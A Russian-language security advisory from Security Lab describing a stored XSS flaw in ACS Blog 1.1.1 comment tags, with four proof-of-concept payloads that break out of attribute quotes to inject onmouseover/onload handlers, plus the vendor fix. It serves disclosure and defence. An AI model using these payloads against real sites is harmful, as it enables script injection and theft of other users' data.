Security Lab

Межсайтовый скриптинг в ACS Blog

Дата публикации:04.04.2005
Дата изменения:24.03.2009
Всего просмотров:1106
Опасность:
Средняя
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: ACS Blog 1.x
Уязвимые версии: ACS Blog 1.1.1

Описание:
Обнаруженная уязвимость позволяет удаленному пользователю произвести XSS нападение и получить доступ к потенциально важным данным других пользователей.

Уязвимость существует из-за некорректной обработки входных данных в комментариях в тегах [link], [mail], и [img]. Удаленный пользователь может с помощью специально сформированного тега опубликовать злонамеренный HTML сценарий и выполнить его в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

[link=http://www.google.com' onmouseover='alert("XSS vulnerability")'
o=']Don't you wanna see where this link goes?[/link]

[mail=bugtraq@securityfocus.com' onmouseover='
alert("XSS vulnerability")' o=']Mr. Wiggles[/mail]

[img]http://www.example.com/image.jpg' onload='
alert("XSS vulnerability")' o='[/img]

[link=http://www.google.com target=_blank'
onmouseover=a=/Vulnerability/;alert(a.source) o=']Hooray[/link]

URL производителя: www.asppress.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Multiple XSS vulnerabilities in ACS Blog